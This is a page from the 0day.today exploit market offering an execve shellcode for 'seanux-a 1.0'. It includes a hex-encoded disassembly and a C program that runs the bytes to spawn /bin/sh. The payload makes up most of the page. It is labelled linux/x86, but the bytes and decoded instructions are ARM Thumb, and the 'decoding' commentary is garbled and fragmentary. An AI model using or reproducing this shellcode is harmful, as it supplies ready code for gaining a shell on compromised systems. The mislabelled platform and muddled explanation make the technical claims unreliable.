[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

linux/x86 seanux-a 1.0 execve shellcode - 80 bytes

Author
vulnerability.xyz
Risk
[
Security Risk High
]
0day-ID
0day-ID-23776
Category
shellcode
Date add
17-06-2015
Platform
linux/x86
# Exploit Title: seanux-a linux os execve shellcode - 80 bytes
# Date: 16-06-2015
# Exploit Author: vulnerability.xyz team
# Vendor Homepage: http://sea.sy/index/en
# Software Link: http://sea.sy/index/en
# Version: 1.0 BOX
# Tested on:  seanux-a 1.0 


[+] string will be :  
 3030303038303534203c5f73746172743e3a0d0a20202020383035343a09653238663630303120096164640972362c2070632c2023310d0a20202020383035383a096531326666663136200962780972360d0a20202020383035633a0934363738202020202020096d6f760972302c2070630d0a20202020383035653a093330306120202020202009616464730972302c202331300d0a20202020383036303a0939303031202020202020097374720972302c205b73702c2023345d0d0a20202020383036323a0961393031202020202020096164640972312c2073702c2023340d0a20202020383036343a093161393220202020202009737562730972322c2072322c2072320d0a20202020383036363a0932373062202020202020096d6f76730972372c202331310d0a20202020383036383a09646630312020202020200973766309310d0a20202020383036613a0932663266202020202020092e73686f7274093078326632660d0a20202020383036633a09326636653639363220092e776f726409307832663665363936320d0a20202020383037303a09303030303638373320092e776f72640930783030303036383733  
 [+] Now decoding the shellcode   
 :> line : 20202020383036613a0932663266202020202020092e73686f7274093078326632660d0a  
 :> converting to asm :   
  806a + 0x2f2f  
 :> SHELLCODING : C++ or C#   
 :> Full shellcdoing will be generetd with C# asmb auto payload can found :>  
 9303030303638373320092e ( nullebytes ) = 0 "  
 #include <stdio.h>  
 char *SC =     "\x01\x60\x8f\xe2"  
           "\x16\xff\x2f\xe1"  
           "\x78\x46"  
           "\x0a\x30"  
           "\x01\x90"  
           "\x01\xa9"  
           "\x92\x1a"  
           "\x0b\x27"  
           "\x01\xdf"  
           "\x2f\x2f"  
           "\x62\x69"  
           "\x6e\x2f"  
           "\x73\x68\x00\x00";  
 int main(void)  
 {  
      fprintf(stdout,"Length: %d\n",strlen(SC));  
      (*(void(*)()) SC)();  
 return 0;  
 }

#  0day.today [2024-11-16]  #